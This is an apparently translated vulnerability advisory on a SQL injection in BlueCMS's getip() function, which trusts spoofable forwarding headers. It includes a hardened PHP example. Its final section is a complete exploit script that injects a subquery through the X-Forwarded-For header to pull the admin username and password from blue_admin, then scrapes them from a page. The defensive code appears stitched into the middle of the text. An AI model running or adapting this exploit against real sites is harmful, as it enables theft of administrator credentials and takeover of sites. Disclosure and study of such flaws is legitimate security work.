BlueCMS getip() SQL Injection Vulnerability
author: cnryan
team: bbs.wolvez.org
blog: http://hi.baidu.com/cnryan
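1. Description
BlueCMS is a CMS built specifically for local classified-information portals.
When the program uses the getip() function to obtain the client IP, it does not strictly filter the data, which leads to a SQL injection vulnerability.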
2. Analysis
//comment.php
$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')"; // note the getip() call
$db->query($sql);
Now look at this function:
//include/common.fun.php
function getip()
{
    if (getenv('HTTP_CLIENT_IP')) {
        $ip = getenv('HTTP_CLIENT_IP'); // can be spoofed
    } elseif (getenv('HTTP_X_FORWARDED_FOR')) {
        $ip = getenv('HTTP_X_FORWARDED_FOR'); // can be spoofed
    } elseif (getenv('HTTP_X_FORWARDED')) {
        $ip = getenv('HTTP_X_FORWARDED');
    } elseif (getenv('HTTP_FORWARDED_FOR')) {
        $ip = getenv('HTTP_FORWARDED_FOR');
    } elseif (getenv('HTTP_FORWARDED')) {
        $ip = getenv('HTTP_FORWARDED');
    } else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}
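The vulnerability is fairly simple: it is the age-old $_SERVER problem, where client-supplied request headers are trusted and reach the SQL statement unfiltered.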
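A hardened counterpart to the two snippets above, as an added example that is not BlueCMS code and not the author's. `get_client_ip()`, `save_comment()`, `TRUSTED_PROXIES`, the simplified `comment` table and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
// Added example, not BlueCMS code. get_client_ip(), save_comment(),
// TRUSTED_PROXIES and the simplified comment table are hypothetical.
const TRUSTED_PROXIES = ['127.0.0.1']; // assumption: your reverse proxy address

function get_client_ip(array $server): string
{
    // REMOTE_ADDR is the TCP peer address; it is not taken from a request header.
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0';
    }
    // Forwarding headers are client-controlled unless a known proxy set them.
    if (!in_array($remote, TRUSTED_PROXIES, true)
        || !isset($server['HTTP_X_FORWARDED_FOR'])) {
        return $remote;
    }
    // Walk the chain right to left: the first hop that is not one of our
    // proxies is the client. Any entry that is not a literal IP ends the walk.
    $hops = array_reverse(array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'])));
    foreach ($hops as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            break;
        }
        if (!in_array($hop, TRUSTED_PROXIES, true)) {
            return $hop;
        }
    }
    return $remote;
}

function save_comment(PDO $db, int $postId, string $content, array $server): void
{
    // Bound parameters keep every value out of the SQL text, so the ip
    // column stays data even if validation were bypassed.
    $stmt = $db->prepare('INSERT INTO comment (post_id, content, ip) VALUES (?, ?, ?)');
    $stmt->execute([$postId, $content, get_client_ip($server)]);
}

// Constructed sample: peer is not a trusted proxy, so its header is ignored.
$db = new PDO('sqlite::memory:'); // assumption: pdo_sqlite is available
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comment (post_id INTEGER, content TEXT, ip TEXT)');
$spoofed = [
    'REMOTE_ADDR' => '198.51.100.7',
    'HTTP_X_FORWARDED_FOR' => "203.0.113.9', 'x",
];
save_comment($db, 1, 'test', $spoofed);
var_dump($db->query('SELECT ip FROM comment')->fetchColumn());
```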
3. Exploitation
Finally, an exploit is attached:
<?php
print_r('
+---------------------------------------------------------------------------+
BlueCMS v1.6 sp1 Getip() Remote SQL Injection Exploit
by cnryan
Mail: cnryan2008[at]gmail[dot]com
Blog: http://hi.baidu.com/cnryan
+---------------------------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Example:
php '.$argv[0].' localhost /bluecms/
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
send();
send2();

function send()
{
    global $host, $path;
    $cmd = "mood=6&comment=test&id=1&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB";
    $getinj=" 00','1'),('','1','0','1','6',(select concat('<u-',admin_name,'-u><p-',pwd,'-p>') from blue_admin),'1281181973','99";
    $data = "POST ".$path."comment.php?act=send HTTP/1.1/r/n";
    $data .= "Accept: */*/r/n";
    $data .= "Accept-Language: zh-cn/r/n";
    $data .= "Content-Type: application/x-www-form-urlencoded/r/n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n";
    $data .= "Host: $host/r/n";
    $data .= "Content-Length: ".strlen($cmd)."/r/n";
    $data .= "Connection: Close/r/n";
    $data .= "X-Forwarded-For: $getinj/r/n/r/n";
    $data .= $cmd;
    $fp = fsockopen($host, 80);
    fputs($fp, $data);
    $resp = '';
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    return $resp;
}

function send2()
{
    global $host, $path;
    $message="GET ".$path."news.php?id=1 HTTP/1.1/r/n";
    $message.="Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*/r/n";
    $message.="Accept-Language: zh-cn/r/n";
    $message.="Accept-Encoding: gzip, deflate/r/n";
    $message.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; GreenBrowser)/r/n";
    $message.="Host: $host/r/n";
    $message.="Connection: Keep-Alive/r/n/r/n";
    $fd = fsockopen($host,'80');
    if(!$fd) {
        echo '[-]No response from'.$host;
        die;
    }
    fputs($fd,$message);
    $resp = '';
    while (!feof($fd)) {
        $resp.=fgets($fd);
    }
    fclose($fd);
    preg_match_all("/<u-([^<]*)-u><p-([^<]*)-p>/",$resp,$db);
    if($db[1][0]&$db[2][0]) {
        echo "username->".$db[1][0]."/r/n";
        echo "password->".$db[2][0]."/r/n";
        echo "[+]congratulation ^ ^";
    }else
        die('[-]exploited fail >"<');
}
?>